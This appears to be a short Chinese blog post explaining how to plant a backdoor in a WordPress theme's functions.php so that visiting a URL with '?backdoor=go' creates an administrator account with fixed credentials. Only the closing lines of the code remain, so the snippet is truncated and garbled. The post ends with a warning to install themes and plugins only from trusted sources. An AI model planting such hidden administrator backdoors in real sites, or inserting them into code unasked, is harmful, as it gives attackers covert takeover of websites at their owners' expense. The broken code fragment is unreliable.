给网站留一手,wordpress后门初级篇
此文章有一定风险仅供学习用。
set_role( ‘administrator’ );
}
}
}
比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://vr.ccyzk.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员
所以请最好在官网或者cc云中客下载插件和主题,以免被来路不明的插件和主题留了个backdoor
原创文章,转载时必须以链接形式注明本文来自云中客,本文固定链接:http://vr.ccyzk.com/199.htm